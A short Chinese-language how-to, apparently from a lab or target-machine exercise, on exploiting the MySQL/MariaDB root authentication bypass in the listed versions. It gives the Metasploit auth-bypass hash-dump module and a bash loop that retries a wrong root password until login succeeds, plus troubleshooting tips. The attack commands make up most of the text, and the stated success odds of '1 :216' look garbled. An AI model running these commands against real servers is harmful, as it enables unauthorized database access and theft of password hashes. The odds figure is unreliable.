在数据库种类和版本在:
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23
MySQL versions from 5.1.63, 5.5.24, 5.6.6
存在该漏洞,当只知道用户名为root的前提下,不断地尝试度登录,即使密码错误也有可能登陆成功,其概率大概为1 :216。
两种思路:
1.使用msf:
use scanner/mysql/mysql_authbypass_hashdump
使用msf的这个模块,然后只需要配置rhost,即目标机器ip地址,然后run或者exploit。
当然不知道为什么,我一直不行,可能是运气不好或者别的问题吧,因为我猜测其总共尝试次数不超过100次,当然你运气好应该能成功。
2.使用bash命令,循环尝试:
for i in `seq 1 1000`;do mysql -uroot -pwhatever -h ip -P 3306;done
推荐使用这个,当然靶机有可能报
rror: undefined method `encoding' for nil:NilClass
这是因为你尝试次数过多,然后靶机代码编写有点问题造成的,登录靶机数据库使用命令,
flush hosts;
然后再次尝试就行了。
注意,``不是单引号,然后第二个-P要大写,不然会出现一些耐人寻味的情况。